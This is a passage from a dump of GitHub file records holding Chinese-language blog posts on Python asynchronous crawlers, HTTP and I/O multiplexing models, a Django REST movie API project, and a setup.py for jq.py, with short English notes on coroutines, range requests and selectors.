event_mask)\n```\n调用select系统函数所有的事件通知都会在事件循环中被处理。之后,fetch函数将控制权交还给事件循环。当事件循环执行上面Fetcher中注册的connected回调函数时,应用程序这才知道socket建立完成了。\n\n下面是connected回调函数的实现:\n```\n# Method on Fetcher class.\n def connected(self, key, mask):\n print('connected!')\n selector.unregister(key.fd)\n request = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(self.url)\n self.sock.send(request.encode('ascii'))\n\n # Register the next callback.\n selector.register(key.fd,\n EVENT_READ,\n self.read_response)\n```\nconnected函数发送一个Get请求。真实的应用将会检查返回值,假设全部的消息一次发送不完。但是我们的请求很小,并且我们的应用是正常的应用程序(无恶意)。所以,我们的应用直接调用send函数,然后等待返回结果。当然,他需要注册另外一个回调函数并将控制权交还给事件循环。最后一个回调函数read_response,处理服务端返回:\n\n```\n# Method on Fetcher class.\n def read_response(self, key, mask):\n global stopped\n\n chunk = self.sock.recv(4096) # 4k chunk size.\n if chunk:\n self.response += chunk\n else:\n selector.unregister(key.fd) # Done reading.\n links = self.parse_links()\n\n # Python set-logic:\n for link in links.difference(seen_urls):\n urls_todo.add(link)\n Fetcher(link).fetch() # <- New Fetcher.\n\n seen_urls.update(links)\n urls_todo.remove(self.url)\n if not urls_todo:\n stopped = True\n```\n这个回调函数将在selector检测到套接字是“readable”可读状态是被触发执行,这意味着两种可能的事情:一是套接字上的数据准备好了,另一个是套接字被关闭了。\n\n这个回调函数在准备好数据的套接字上读取1个chunk大小的数据(chunk小于等于4k),如果套接字上的数据大于4k,那么这次只读取4k,并且套接字保持readable状态,等待下次事件循环调度触发。当返回完成,服务端关闭套接字,并且返回空。\n\nparse_links方法没有介绍,他返回URL集合。每个URL实例化一个Fetcher实例,不存在并发的情况。\n\n注意使用带回调的异步编程的一个特点:在修改共享数据时不需要使用互斥,例如,我们对seen_urls添加元素。多任务没有抢占机制,所以,我们不能在代码中任意地方中断。\n\n我们添加一个stopped全局变量来控制事件循环:\n```\nstopped = False\n\ndef loop():\n while not stopped:\n events = selector.select()\n for event_key, event_mask in events:\n callback = event_key.data\n callback()\n```\n当所有网页都下载完成,Fetcher将停止全局的事件循环,然后程序退出。\n\n这个例子使用面条式的写法使得异步程序看起来很简单。我们接下来要增加一些计算和I/O操作,并且调度这些操作并发执行。但不使用线程,这些操作也不能实现在一个函数中:当一个函数开始执行I/O操作,说明需要保持一个状态,并且将来会使用到,然后返回,你的职责是思考并且实现这个状态保持的程序。\n\n解释下这是什么意思呢?想想看,使用传统的阻塞I/O在线程中实现抓取一个URL是多么简单啊!\n```\n# Blocking version.\ndef fetch(url):\n sock = socket.socket()\n sock.connect(('xkcd.com', 80))\n request = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(url)\n sock.send(request.encode('ascii'))\n response = b''\n chunk = sock.recv(4096)\n while chunk:\n response += chunk\n chunk = sock.recv(4096)\n\n # Page is now downloaded.\n links = parse_links(response)\n q.add(links)\n```\n这个函数在不同套接字之间保存什么状态了?他保持有socket,url和累计的返回结果。传统线程中函数保存状态在堆栈的临时变量中。这个函数有一个“continuation”:会在I/O完成之后执行。运行时环境使用线程的指令指针来保存这个“continuation”。你不需要考虑在I/O完成之后重新保存这些本地变量和“continuation”,他是编程语言内置的功能。\n\n但是,基于回调的异步框架,这些编程语言的内置功能作用也不大。等待I/O时,函数需要明确保存状态,因为,在I/O完成之前函数就返回并且失去了他的栈帧。在我们基于回调的例子中,我们不使用本地变量,而是使用Fetcher的实例变量来保存sock和response。我们不使用指令指针,而是注册connected和read_response回调函数来保存“continuation”。随着应用功能的增加,我们需要手动通过回调保存的状态也越来越复杂。如此繁重的记账式的实现让开发者头疼。\n\n更糟糕的,在回调链在调度到下一个回调之前抛出了异常会发生什么?也就是说,我们在parse_links函数上实现的不好,解析某些页面时抛出了异常:\n```\nTraceback (most recent call last):\n File \"loop-with-callbacks.py\", line 111, in <module>\n loop()\n File \"loop-with-callbacks.py\", line 106, in loop\n callback(event_key, event_mask)\n File \"loop-with-callbacks.py\", line 51, in read_response\n links = self.parse_links()\n File \"loop-with-callbacks.py\", line 67, in parse_links\n raise Exception('parse error')\nException: parse error\n\n```\n异常堆栈中只显示事件循环在执行回调。我们无法知道什么导致了错误。这条链的两端都被破坏:我们忘记了要去哪里,也不知道从哪里来。这种丢失上下文称为“堆栈撕裂”,经常迷惑开发者。堆栈撕裂也阻止我们为回调链设置异常处理,也就是“try/except”块包裹的函数调用及其调用树。\n\n所以,我们避免讨论多线程和异步的效率,有关于哪个更易发错误的争论:多线程下,如果同步使用错误,容易受到数据竞争的影响。然而,回调因为堆栈撕裂的存在而难以调试。\n"
},
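The post above stops at callbacks and stack ripping; the next stage promised in its introduction replaces callbacks with generator-based coroutines. The sketch below is a minimal Future/Task pair in that spirit. It is a toy reduction of the pattern, not the article's exact code, and the `fake_io` wiring is an invented stand-in for the selector.

```
class Future:
    """A result that is not ready yet; callbacks run when it resolves."""
    def __init__(self):
        self.result = None
        self._callbacks = []

    def add_done_callback(self, fn):
        self._callbacks.append(fn)

    def set_result(self, result):
        self.result = result
        for fn in self._callbacks:
            fn(self)


class Task:
    """Drive a generator: each yielded Future resumes the generator when done."""
    def __init__(self, coro):
        self.coro = coro
        self.step(Future())  # prime with a dummy resolved future (result is None)

    def step(self, future):
        try:
            next_future = self.coro.send(future.result)
        except StopIteration:
            return
        next_future.add_done_callback(self.step)


pending = []  # stands in for the selector: futures waiting on "I/O"

def fake_io():
    f = Future()
    pending.append(f)
    return f

def fetch():
    data = yield fake_io()   # looks sequential, but suspends without blocking
    print('got', data)

Task(fetch())
pending.pop().set_result(b'response bytes')  # the "event loop" completes the I/O
```

The point is that `fetch` keeps its locals and its continuation on the generator's own frame, so none of the manual Fetcher-style bookkeeping is needed.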
{
"alpha_fraction": 0.38181817531585693,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 12.75,
"blob_id": "db5e17d9d82a9fa1fa34029a08ad7ceb3a3a0d79",
"content_id": "9751664844652d7eb9ed405055c609e22bd1ad35",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 4,
"path": "/source/alidb-monthly/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: alidb_monthly\ndate: 2018-09-28 21:19:20\n---\n"
},
{
"alpha_fraction": 0.7062146663665771,
"alphanum_fraction": 0.7271186709403992,
"avg_line_length": 19.34482765197754,
"blob_id": "0d5748036aef12528d89229f4d1c37daf4ec4ec0",
"content_id": "eb393e42f760571db5f2bf443ba8a58804333c9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3638,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 87,
"path": "/source/_posts/http.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: HTTP协议简介\ndate: 2018-02-02 21:23:59\ncategories: HTTP\ntags: [HTTP,TCP/IP,加密]\n---\n\n** 首先了解下TCP/IP四层模型: **\n- 应用层\n a. HTTP\n b. FTP\n c. DNS\n d. ...\n- 传输层:保证可靠传输\n a. TCP\n b. UDP\n- 网络层\n- 链路层\n\n下面这张图显示了HTTP请求的大概流程:\n\n图中清楚的展示了请求的处理流程,请求到达每一层都会加上响应的头部信息;返回则层次去掉的过程;\n传输层的TCP协议保证了数据的可靠传输,采用分段的方式传输报文;\n\n** TCP的可靠性保证:**\n - 连接时三次握手\n\n** 三次握手过程: **\n - 客户端发送带有SYN的连接请求到服务器端\n - 服务器端接受到客户端的连接请求后,发送带有SYN/ACK的连接请求收到的确认信息\n - 客户端收到服务端发送过来的请求确认后,再次发送服务端发送的确认信息收到的确认。此时连接建立;\n\n** HTTP无状态特性:** 保证可以快速处理更多事务,确保协议可伸缩性;但是有些场景需要保持用户的状态(如电商网站的登录状态,所以引入了cookie;\n\n** 持久连接(keep-alive)** 目前的HTTP1.1默认是持久连接的,即在多次请求中只有第一次是经过三次握手建立TCP连接的,直到有一端明确提出端口连接为止;\n在此持久连接的基础,可以支持并行发送多个请求,让整个请求时间减少;\n\n** Cookie: ** \n1. 客户端向服务端发送请求;\n2. 服务端生成cookie,并返回cookie 和 请求数据信息 给客户端\n3. 客户端接收到服务端发送过来的数据后,接下来的请求中会携带cookie信息和请求信息,服务端就可以根据cookie信息来判断是哪个客户端;\nRange:范围请求,客户端只请求指定的一部分数据\nRange:bytes=3000-5000\n服务器返回206,partial content的响应报文\n\n\n** Http报文 **\n包括:报文首部,报文主体\n- 报文首部:\n\t- 通用首部字段\n\t + cache-control\n\t + connection\n\t + ...\n\t- 请求首部字段\n\t + Accept\n\t + Accept-Charset\n\t + Accept-Encoding\n\t + User-Agent\n\t + Range\n\t + Authorization\n\t + ...\n\t- 响应首部字段\n\t + Accept-Ranges\n\t + ETag\n\t + Server\n\t + ...\n\t- 实体首部字段\n\t + Content-Encoding\n\t + Content-Language\n\t + Content-Type\n\t + Content-Range\n\t + ...\n\n** Http缺点 **\n 1. 明文传输不安全,内容可能被窃听\n 2. 不验证通讯方身份,有可能遭遇伪装\n 3. 无法判断报文是否完整,有可能被篡改\n\n** Https是Http通过和SSL或TSL组合加密的协议 **\n\n\n** HTTPS(SSL) 加密方式对比:**\n 1. 公开密钥加密思路:使用两个密钥,一个公钥,一个私钥,用户使用服务端的公开密钥加密数据包,然后发送到服务器端,服务端接收到数据包后,使用自己的私钥解密。这样即使数据包被窃取,由于没有解密的私钥,内容也不会被看到;\n 2. 共享密钥加密思路:解密和解密使用同一个密钥解密,这样密钥需要在客户端和服务端之间传递,才能到达解密的目的。传输密钥的过程可能被窃取,数据就可能被窃取到了;\n\nHttps是综合了公开密钥加密和共享密钥加密机制; 由于**公开密钥加密速度慢,但安全;共享密钥加密速度快,但密码可能被窃取**;\n所以HTTP结合两者优缺点,**在共享密钥传输密码阶段使用公开密钥加密,保证共享密钥的安全;之后的数据传输采用共享密钥加密的机制;**\n"
},
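The Range / 206 Partial Content exchange described above can be tried from Python's standard library. The sketch below issues a range request with http.client; example.com is just a placeholder host, and whether the server honors the range (206) or ignores it (200) depends on that server.

```
import http.client

conn = http.client.HTTPConnection('example.com', 80)
conn.request('GET', '/', headers={'Range': 'bytes=0-99'})
resp = conn.getresponse()

print(resp.status, resp.reason)          # 206 Partial Content if ranges are supported
print(resp.getheader('Content-Range'))   # e.g. "bytes 0-99/1256"
body = resp.read()
print(len(body), 'bytes received')
conn.close()
```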
{
"alpha_fraction": 0.80402010679245,
"alphanum_fraction": 0.8198685646057129,
"avg_line_length": 34.45205307006836,
"blob_id": "ceaee287718a56b6618778caa8f82ac58b003613",
"content_id": "4b6f28c3a04ce594cc561c34b70fd5b4482ebb8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5885,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 73,
"path": "/source/_posts/io-model.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 四种基本的I/O模型\ndate: 2018-05-16 21:55:00\ncategories: IO\ntags: [Blocking,IO,同步,异步]\n---\n\n### 常用的四种IO模型:\n#### 1)blocking IO(阻塞IO模型)\n客户端需要等待服务端返回数据,整个过程是串行的\n#### 2)non-blocking IO(非阻塞IO)\n服务端立即相应客户端,数据没有准备好就返回Error,客户端需要轮询服务端获取想要的数据,直到数据准备好并返回\n#### 3)IO multiplexing(IO多路复用)\nIO多路复用的三种方式:\n\n- 1、select效率最低,但有最大描述符限制,在linux为1024。\n- 2、poll和select一样,但没有最大描述符限制。\n- 3、epoll效率最高,没有最大描述符限制,支持水平触发与边缘触发。\n\n**IO多路复用的优势**:同时可以监听多个连接,用的是单线程,利用空闲时间实现并发。\n\n#### 4)Asynchronous I/O(异步IO)\n用户进程发起read操作之后,立刻就可以开始去做其它的事。而另一方面,从kernel的角度,当它受到一个asynchronous read之后,首先它会立刻返回,所以不会对用户进程产生任何block。然后,kernel会等待数据准备完成,然后将数据拷贝到用户内存,当这一切都完成之后,kernel会给用户进程发送一个signal,告诉它read操作完成了。\n异步最大特点:全程无阻塞\n\n\n### sellect、poll、epoll三者的区别 :\n#### select:\n- 目前支持几乎所有的平台,默认单个进程能够监视的文件描述符的数量存在最大限制,在linux上默认只支持1024个socket,可以通过修改宏定义或重新编译内核(修改系统最大支持的端口数)的方式提升这一限制。\n- 内核准备好数据后通知用户有数据了,但内核不告诉用户是哪个连接有数据,用户只能通过轮询的方式来获取数据,假定select让内核监视100个socket连接,当有1个连接有数据后,内核就通知用户100个连接中有数据了,但是不告诉用户是哪个连接有数据了,此时用户只能通过轮询的方式一个个去检查然后获取数据,那么如果有上万个,十万个连接,那就得轮询上万次,上十万次,而所取的结果仅仅就那么1个,这样就会浪费很多系统开销\n- 只支持水平触发\n- 每次调用select,都需要把fd集合从用户态拷贝到内核态,这个开销在fd很多时会很大\n#### poll:\n\n- 与select没有本质上的差别,仅仅是没有了最大文件描述符数量的限制\n- 只支持水平触发\n- 只是一个过渡版本,很少用\n\n#### epoll:\n- Linux2.6才出现epoll,具备了select和poll的一切优点,公认为性能最好的多路IO就绪通知方法,没有最大文件描述符数量的限制,不支持windows平台\n- 内核准备好数据以后会通知用户哪个连接有数据了,IO效率不随fd数目增加而线性下降\n- 同时支持水平触发和边缘触发\n- 使用mmap加速内核与用户空间的消息传递(内存零拷贝)\n\n### 水平触发与边缘触发:\n** 水平触发:** 将就绪的文件描述符告诉进程后,如果进程没有对其进行IO操作,那么下次调用epoll时将再次报告这些文件描述符,这种方式称为水平触发\n\n** 边缘触发:** 只告诉进程哪些文件描述符刚刚变为就绪状态,它只说一遍,如果我们没有采取行动,那么它将不会再次告知,这种方式称为边缘触发\n\n### select和epoll的特点:\n#### select:\nselect通过一个select()系统调用来监视多个文件描述符的数组,当select()返回后,该数组中就绪的文件描述符便会被内核修改标志位,使得进程可以获得这些文件描述符从而进行后续的读写操作。由于网络响应时间的延迟使得大量TCP连接处于非活跃状态,但调用select()会对所有socket进行一次线性扫描,所以这也浪费了一定的开销。\n\n#### epoll:\n- epoll同样只告知那些就绪的文件描述符,而且当我们调用epoll_wait()获得就绪文件描述符时,返回的不是实际的描述符,而是一个代表就绪描述符数量的值,你只需要去epoll指定的一个数组中依次取得相应数量的文件描述符即可,这里也使用了内存映射(mmap)技术,这样便彻底省掉了这些文件描述符在系统调用时复制的开销。\n- 另一个本质的改进在于epoll采用基于事件的就绪通知方式。在select/poll中,进程只有在调用一定的方法后,内核才对所有监视的文件描述符进行扫描,而epoll事先通过epoll_ctl()来注册一个文件描述符,一旦基于某个文件描述符就绪时,内核会采用类似callback的回调机制,迅速激活这个文件描述符,当进程调用epoll_wait()时便得到通知。\n\n- select和poll都需要在返回后,通过遍历所有文件描述符来获取已经就绪的socket。事实上,同时连接的大量客户端在一时刻可能只有很少的处于就绪状态,因此随着监视的描述符数量的增长,其效率也会线性下降。\n\n### IO操作分两个阶段:\n- 1、等待数据准备好(数据读到内核缓存) \n- 2、将数据从内核读到用户空间(进程空间) \n一般来说第一阶段操作花费的时间远远大于第二阶段。 \n\n### 同步IO & 异步IO:\n** 同步IO ** :包括 blocking IO、non-blocking、select、poll、epoll(故:epool只是伪异步而已)(有阻塞)\n** 异步IO ** :包括:asynchronous (无阻塞)\n** 主要区别 ** :IO操作的第二阶段是阻塞的,然而这阶段操作花费时间远远小于第一个阶段,epoll和kqueue已经做到很好了。\n\n### Reactor & Proactor\n** Reacor模式 ** 包括:epoll(*nux), kqueue(FreeBSD)、select(POSIX标准)\n\n** Proactor模式 ** 包括:IOCP(Windows)"
}
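The level-triggered multiplexing described above maps directly onto Python's selectors module, which picks epoll, kqueue or select for the platform, as the earlier crawler post notes for DefaultSelector. Below is a minimal single-threaded echo-server sketch using it; the port number is arbitrary.

```
import selectors
import socket

sel = selectors.DefaultSelector()

def accept(server):
    conn, addr = server.accept()
    conn.setblocking(False)
    sel.register(conn, selectors.EVENT_READ, echo)

def echo(conn):
    data = conn.recv(4096)
    if data:
        conn.send(data)        # echo back; one thread, many connections
    else:
        sel.unregister(conn)   # peer closed the socket
        conn.close()

server = socket.socket()
server.bind(('localhost', 12345))
server.listen()
server.setblocking(False)
sel.register(server, selectors.EVENT_READ, accept)

while True:
    for key, mask in sel.select():   # blocks until some socket is ready
        key.data(key.fileobj)        # dispatch to the registered callback
```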
] | 41 |
OtchereDev/Omdbapi-Clone | https://github.com/OtchereDev/Omdbapi-Clone | 9a4c1104e8b8b266009705ff1a5ee1bdb8c93f9e | 411c89944a1d6e7ba77e225a8ae263db08d6150f | 9baaafb88ecb1ac860cdc09896a1f9d3013cb861 | refs/heads/main | 2023-03-14T01:31:34.067791 | 2021-03-05T13:59:24 | 2021-03-05T13:59:24 | 344,828,234 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6107317209243774,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 24.5,
"blob_id": "a43ab2df49d2aef16135ca430c497590871b8f0e",
"content_id": "460bcc5563fd80aac62a12b1887dfc15337a9eaa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 40,
"path": "/api/models.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\nRATE_CHOICES=(\n ('5','5 Stars'),\n ('4','4 Stars'),\n ('3','3 Stars'),\n ('2','2 Stars'),\n ('1','1 Stars'),\n ('N/A','N/A'),\n)\n\nTYPE=(\n ('movie','movie'),\n ('series','series'),\n ('episode','episode'),\n)\n\nclass Movie(models.Model):\n title=models.CharField(max_length=255)\n description=models.TextField()\n created=models.DateField()\n rated=models.CharField(choices=RATE_CHOICES,max_length=4)\n duration=models.CharField(max_length=10)\n genre=models.ForeignKey('Genre',on_delete=models.SET_NULL,null=True,blank=True)\n actors=models.TextField()\n country=models.CharField(max_length=200)\n type=models.CharField(choices=TYPE,max_length=10)\n poster=models.ImageField()\n director=models.CharField(max_length=250)\n language=models.CharField(max_length=250)\n\n def __str__(self) -> str:\n return self.title\n\n\nclass Genre(models.Model):\n name=models.CharField(max_length=300)\n\n def __str__(self) -> str:\n return self.name\n \n"
},
{
"alpha_fraction": 0.48225805163383484,
"alphanum_fraction": 0.48225805163383484,
"avg_line_length": 23.639999389648438,
"blob_id": "7c7921699b151ac22cf5a90b38a2dfd49d1f9a18",
"content_id": "f2537d87ce963581ac94a251183712afee9f8032",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 620,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 25,
"path": "/api/serializers.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from rest_framework.serializers import ModelSerializer\nfrom .models import Genre, Movie\n\nclass GenreSerializer(ModelSerializer):\n class Meta:\n model=Genre\n fields=['name']\n\n\nclass MovieSerializer(ModelSerializer):\n genre=GenreSerializer()\n class Meta:\n model=Movie\n fields=['title',\n 'description',\n 'created',\n 'rated',\n 'duration',\n 'genre',\n 'actors',\n 'country',\n 'type',\n 'poster',\n 'director',\n 'language',]\n\n\n\n\n"
},
{
"alpha_fraction": 0.7875382900238037,
"alphanum_fraction": 0.7875382900238037,
"avg_line_length": 27.764705657958984,
"blob_id": "d2c77d6e4bcb98dfd295d28a2bfc13a0ee5bb5d1",
"content_id": "6a092de39f0589f30b31793f8f92d92693bf11a3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 34,
"path": "/api/views.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from django.db.models import query\nfrom django.shortcuts import render\nfrom rest_framework.generics import CreateAPIView, ListAPIView, ListCreateAPIView, RetrieveAPIView\nfrom django_filters.rest_framework import DjangoFilterBackend\n\n\nfrom .models import Genre, Movie\nfrom .serializers import MovieSerializer,GenreSerializer\n\n\nclass MovieListView(ListAPIView):\n queryset=Movie.objects.all()\n serializer_class=MovieSerializer\n filter_backends=[DjangoFilterBackend]\n filterset_fields = ['title','genre__name','language','type']\n\n\n\nclass MovieCreateView(CreateAPIView):\n serializer_class=MovieSerializer\n queryset=Movie.objects.all()\n\n\nclass MovieDetailView(RetrieveAPIView):\n lookup_field='title'\n queryset=Movie.objects.all()\n serializer_class=MovieSerializer\n\n\nclass GenreListCreateView(ListCreateAPIView):\n queryset=Genre.objects.all()\n serializer_class=GenreSerializer\n filter_backends=[DjangoFilterBackend]\n filterset_fields = ['name',]\n\n"
},
{
"alpha_fraction": 0.5094339847564697,
"alphanum_fraction": 0.5347877144813538,
"avg_line_length": 41.400001525878906,
"blob_id": "a42cdca2269bf0b691ef1700b12fcd1bd2c501d3",
"content_id": "645c686f8bf4acf77f1104cc2b05d95c5f03c9e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1696,
"license_type": "permissive",
"max_line_length": 174,
"num_lines": 40,
"path": "/api/migrations/0001_initial.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.7 on 2021-03-05 11:52\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Genre',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=300)),\n ],\n ),\n migrations.CreateModel(\n name='Movie',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=255)),\n ('description', models.TextField()),\n ('created', models.DateTimeField()),\n ('rated', models.CharField(choices=[('5', '5 Stars'), ('4', '4 Stars'), ('3', '3 Stars'), ('2', '2 Stars'), ('1', '1 Stars'), ('N/A', 'N/A')], max_length=4)),\n ('duration', models.TimeField()),\n ('actors', models.TextField()),\n ('country', models.CharField(max_length=200)),\n ('type', models.CharField(choices=[('movie', 'movie'), ('series', 'series'), ('episode', 'episode')], max_length=10)),\n ('poster', models.ImageField(upload_to='')),\n ('director', models.CharField(max_length=250)),\n ('language', models.CharField(max_length=250)),\n ('genre', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='api.genre')),\n ],\n ),\n ]\n"
},
{
"alpha_fraction": 0.6935014724731445,
"alphanum_fraction": 0.6964112520217896,
"avg_line_length": 33.33333206176758,
"blob_id": "6b6f1e8e76ca948fc5a1578c61c0d8309b55203e",
"content_id": "4567e6750459e1d54213adcf45f482d4ec2b1c3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1031,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 30,
"path": "/api/urls.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "\nfrom django.urls.conf import path\n\nfrom .views import GenreListCreateView, MovieCreateView, MovieDetailView, MovieListView\n\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Omdbapi API Clone\",\n default_version='v1',\n description=\"Test description\",\n terms_of_service=\"https://[email protected]/\",\n contact=openapi.Contact(email=\"[email protected]\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\napp_name='own_api'\nurlpatterns = [\n path('all_movies/',MovieListView.as_view()),\n path('add_movie/',MovieCreateView.as_view()),\n path('movie/<str:title>/',MovieDetailView.as_view()),\n path('genre/',GenreListCreateView.as_view()),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n]\n"
},
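Given the routes in urls.py and the filterset_fields in views.py, the API can be exercised over plain HTTP. The sketch below uses the requests library against a locally running dev server; the base URL, its mount prefix, and the filter values are all assumptions for illustration.

```
import requests

BASE = 'http://localhost:8000'  # assumed dev-server address and mount point

# list every movie, then narrow by the filter fields declared in MovieListView
print(requests.get(BASE + '/all_movies/').json())
print(requests.get(BASE + '/all_movies/',
                   params={'genre__name': 'Drama', 'type': 'movie'}).json())

# the detail view looks movies up by title (lookup_field = 'title')
print(requests.get(BASE + '/movie/Inception/').json())

# genres support listing and creating on the same endpoint
requests.post(BASE + '/genre/', data={'name': 'Thriller'})
```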
{
"alpha_fraction": 0.7599009871482849,
"alphanum_fraction": 0.7599009871482849,
"avg_line_length": 21.44444465637207,
"blob_id": "3c80edc24d0768ec290e1ac97be787e231bf64af",
"content_id": "24354d23dd4c5b53e628a44d5cdd9830aff49be1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 18,
"path": "/config/api_router.py",
"repo_name": "OtchereDev/Omdbapi-Clone",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\nfrom django.urls.conf import include, path\nfrom rest_framework.routers import DefaultRouter, SimpleRouter\n\nfrom drf_movies.users.api.views import UserViewSet\n\nif settings.DEBUG:\n router = DefaultRouter()\nelse:\n router = SimpleRouter()\n\nrouter.register(\"users\", UserViewSet)\n\n\napp_name = \"api\"\nurlpatterns = [path('',include('api.urls')),]\n\nurlpatterns+=router.urls\n"
}
] | 6 |
jaytcarlson/jq.py | https://github.com/jaytcarlson/jq.py | 0474a8a1f14bf72b425ebeab068be3d3d88b1536 | 8ba99762c386ec65115d97ee0fdcbfddb1e2f230 | 63a45fe73e38a3d445cab6b071fd2d2528561519 | refs/heads/master | 2021-01-22T16:31:27.700499 | 2015-09-13T17:16:04 | 2015-09-13T17:16:40 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6126260757446289,
"alphanum_fraction": 0.6227120161056519,
"avg_line_length": 28.733333587646484,
"blob_id": "64f06afb1e877fbb14b2d29a0f9302f38288f983",
"content_id": "e287b51bd639aff73084d962806193c1bcbab243",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2677,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 90,
"path": "/setup.py",
"repo_name": "jaytcarlson/jq.py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport platform\nimport subprocess\nimport tarfile\nimport shutil\n\ntry:\n import sysconfig\nexcept ImportError:\n # Python 2.6\n from distutils import sysconfig\n\nfrom setuptools import setup\nfrom distutils.extension import Extension\nfrom distutils.command.build_ext import build_ext\n\ntry:\n from urllib import urlretrieve\nexcept ImportError:\n from urllib.request import urlretrieve\n\ndef path_in_dir(relative_path):\n return os.path.join(os.path.dirname(__file__), relative_path)\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\ntarball_path = path_in_dir(\"_jq-lib-1.5.tar.gz\")\njq_lib_dir = path_in_dir(\"jq-jq-1.5\")\n\nclass jq_build_ext(build_ext):\n def run(self):\n if os.path.exists(tarball_path):\n os.unlink(tarball_path)\n urlretrieve(\"https://github.com/stedolan/jq/archive/jq-1.5.tar.gz\", tarball_path)\n \n if os.path.exists(jq_lib_dir):\n shutil.rmtree(jq_lib_dir)\n tarfile.open(tarball_path, \"r:gz\").extractall(path_in_dir(\".\"))\n \n def command(args):\n print(\"Executing: %s\" % ' '.join(args))\n subprocess.check_call(args, cwd=jq_lib_dir)\n\n macosx_deployment_target = sysconfig.get_config_var(\"MACOSX_DEPLOYMENT_TARGET\")\n if macosx_deployment_target:\n os.environ['MACOSX_DEPLOYMENT_TARGET'] = macosx_deployment_target\n\n command([\"autoreconf\", \"-i\"])\n command([\"./configure\", \"CFLAGS=-fPIC\", \"--disable-maintainer-mode\"])\n command([\"make\"])\n \n build_ext.run(self)\n\n\njq_extension = Extension(\n \"jq\",\n sources=[\"jq.c\"],\n include_dirs=[jq_lib_dir],\n extra_objects=[os.path.join(jq_lib_dir, \".libs/libjq.a\")],\n)\n\nsetup(\n name='jq',\n version='0.1.5',\n description='jq is a lightweight and flexible JSON processor.',\n long_description=read(\"README.rst\"),\n author='Michael Williamson',\n url='http://github.com/mwilliamson/jq.py',\n license='BSD 2-Clause',\n ext_modules = [jq_extension],\n cmdclass={\"build_ext\": jq_build_ext},\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n)\n\n"
}
] | 1 |
panagiotiskalogeridis/exercises | https://github.com/panagiotiskalogeridis/exercises | 3b931e1ab7436e32d1d953fdb10e1df0e439e18f | 89d581be065e33de0bf18d5a4a9505d44c63a056 | 15d4cb30f26d20c81bc777d1b8af2304feeeef31 | refs/heads/master | 2020-04-23T08:26:13.126452 | 2019-02-16T23:00:15 | 2019-02-16T23:00:15 | 171,036,711 | 0 | 0 | null | null | null | null | null | [
{
